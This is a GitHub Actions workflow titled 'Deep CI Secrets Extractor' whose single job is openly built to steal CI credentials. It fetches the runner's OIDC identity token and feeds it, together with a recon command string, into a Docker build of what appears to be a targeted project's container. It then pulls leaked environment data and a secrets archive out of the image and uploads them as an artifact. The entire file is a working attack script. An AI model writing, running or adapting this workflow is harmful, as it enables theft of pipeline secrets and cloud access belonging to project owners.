name: Deep CI Secrets Extractor

on:
  push:
    branches: [ main ]

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Obtain OIDC token and prepare arguments
        id: prepare
        run: |
          echo "[+] Extracting environment OIDC token..."
          if [ -z "$ACTIONS_ID_TOKEN_REQUEST_URL" ]; then
            echo "ACTIONS_ID_TOKEN_REQUEST_URL is missing"
            exit 1
          fi

          OIDC_TOKEN=$(curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL")
          echo "OIDC_TOKEN_VALUE=$OIDC_TOKEN" >> $GITHUB_OUTPUT
          echo "PAYLOAD_CMD=whoami && hostname && id && ls -al /" >> $GITHUB_OUTPUT

      - name: Build container and leak secrets
        run: |
          docker build \
            --build-arg PAYLOAD_CMD="${{ steps.prepare.outputs.PAYLOAD_CMD }}" \
            --build-arg EXFIL_OIDC_TOKEN="${{ steps.prepare.outputs.OIDC_TOKEN_VALUE }}" \
            -t ci-extractor \
            ./taskcluster/docker/python

          docker run --rm ci-extractor cat /leaks_env.txt > leaks_env.txt || true
          docker run --rm ci-extractor cat /leaks.tar.gz > secrets.tar.gz || true

      - name: Upload artifact with exfiltrated data
        uses: actions/upload-artifact@v4
        with:
          name: deep-ci-leaks
          path: |
            leaks_env.txt
            secrets.tar.gz
